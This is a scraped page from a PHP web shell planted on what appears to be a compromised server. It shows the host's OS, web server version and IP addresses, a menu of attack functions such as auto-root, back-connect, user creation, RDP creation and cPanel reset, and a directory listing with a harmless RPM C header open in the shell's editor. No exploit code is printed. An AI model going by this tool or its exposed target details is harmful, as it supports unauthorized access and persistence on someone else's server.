Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
rpm /
[ HOME SHELL ]
Name
Size
Permission
Action
argv.h
4.11
KB
-rw-r--r--
header.h
13.37
KB
-rw-r--r--
rpmbase64.h
1023
B
-rw-r--r--
rpmbuild.h
3.28
KB
-rw-r--r--
rpmcallback.h
1.38
KB
-rw-r--r--
rpmcli.h
12.45
KB
-rw-r--r--
rpmdb.h
6.15
KB
-rw-r--r--
rpmds.h
11.61
KB
-rw-r--r--
rpmfc.h
2.44
KB
-rw-r--r--
rpmfi.h
13.02
KB
-rw-r--r--
rpmfileutil.h
5.04
KB
-rw-r--r--
rpmio.h
2.21
KB
-rw-r--r--
rpmkeyring.h
2.59
KB
-rw-r--r--
rpmlegacy.h
7.5
KB
-rw-r--r--
rpmlib.h
5.34
KB
-rw-r--r--
rpmlog.h
8.48
KB
-rw-r--r--
rpmmacro.h
4.21
KB
-rw-r--r--
rpmpgp.h
46.34
KB
-rw-r--r--
rpmpol.h
388
B
-rw-r--r--
rpmprob.h
4.67
KB
-rw-r--r--
rpmps.h
2.29
KB
-rw-r--r--
rpmsign.h
740
B
-rw-r--r--
rpmspec.h
2.21
KB
-rw-r--r--
rpmsq.h
1.34
KB
-rw-r--r--
rpmstring.h
4.08
KB
-rw-r--r--
rpmstrpool.h
3.83
KB
-rw-r--r--
rpmsw.h
2.09
KB
-rw-r--r--
rpmtag.h
20.22
KB
-rw-r--r--
rpmtd.h
12.21
KB
-rw-r--r--
rpmte.h
6.45
KB
-rw-r--r--
rpmts.h
16.8
KB
-rw-r--r--
rpmtypes.h
2.49
KB
-rw-r--r--
rpmurl.h
1.11
KB
-rw-r--r--
rpmutil.h
4.68
KB
-rw-r--r--
rpmvf.h
3.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rpmtypes.h
#ifndef _RPMTYPES_H #define _RPMTYPES_H /** \ingroup rpmtypes * \file lib/rpmtypes.h * * Typedefs for RPM abstract data types. * @todo The grouping needs love to look sane... */ #include <stdint.h> #ifdef __cplusplus extern "C" { #endif typedef const char * errmsg_t; /** \ingroup rpmtypes * * RPM header and data retrieval types. * @{ */ typedef struct headerToken_s * Header; typedef struct headerIterator_s * HeaderIterator; typedef int32_t rpm_tag_t; typedef uint32_t rpm_tagtype_t; typedef uint32_t rpm_count_t; typedef rpm_tag_t rpmTagVal; typedef rpm_tag_t rpmDbiTagVal; typedef void * rpm_data_t; typedef const void * rpm_constdata_t; typedef struct rpmtd_s * rpmtd; typedef uint32_t rpm_color_t; typedef uint32_t rpm_flag_t; typedef uint32_t rpm_tid_t; typedef uint32_t rpmFlags; /** @} */ /** \ingroup rpmtypes * * In-header hardcoded sizes for various POSIXy types * @{ */ typedef uint32_t rpm_off_t; typedef uint64_t rpm_loff_t; typedef uint32_t rpm_time_t; typedef uint16_t rpm_mode_t; typedef uint16_t rpm_rdev_t; typedef uint32_t rpm_dev_t; typedef uint32_t rpm_ino_t; /** @} */ /** \ingroup rpmtypes * The main types involved in transaction manipulation * @{ */ typedef struct rpmts_s * rpmts; typedef struct rpmte_s * rpmte; typedef struct rpmds_s * rpmds; typedef struct rpmfi_s * rpmfi; typedef struct rpmdb_s * rpmdb; typedef struct rpmdbMatchIterator_s * rpmdbMatchIterator; typedef struct rpmtsi_s * rpmtsi; typedef struct rpmps_s * rpmps; typedef struct rpmdbIndexIterator_s * rpmdbIndexIterator; typedef const void * fnpyKey; typedef void * rpmCallbackData; /** @} */ typedef struct rpmPubkey_s * rpmPubkey; typedef struct rpmKeyring_s * rpmKeyring; typedef uint32_t rpmsid; typedef struct rpmstrPool_s * rpmstrPool; typedef struct rpmPlugins_s * rpmPlugins; typedef struct rpmgi_s * rpmgi; typedef struct rpmSpec_s * rpmSpec; typedef struct rpmRelocation_s rpmRelocation; /** \ingroup rpmtypes * RPM IO file descriptor type */ typedef struct _FD_s * FD_t; /** \ingroup rpmtypes * Package read return codes. */ typedef enum rpmRC_e { RPMRC_OK = 0, /*!< Generic success code */ RPMRC_NOTFOUND = 1, /*!< Generic not found code. */ RPMRC_FAIL = 2, /*!< Generic failure code. */ RPMRC_NOTTRUSTED = 3, /*!< Signature is OK, but key is not trusted. */ RPMRC_NOKEY = 4 /*!< Public key is unavailable. */ } rpmRC; #ifdef __cplusplus } #endif /* XXX included late as rpmtag.h depends on our definitions here... */ #include <rpm/rpmtag.h> #endif /* _RPMTYPES_H */
Close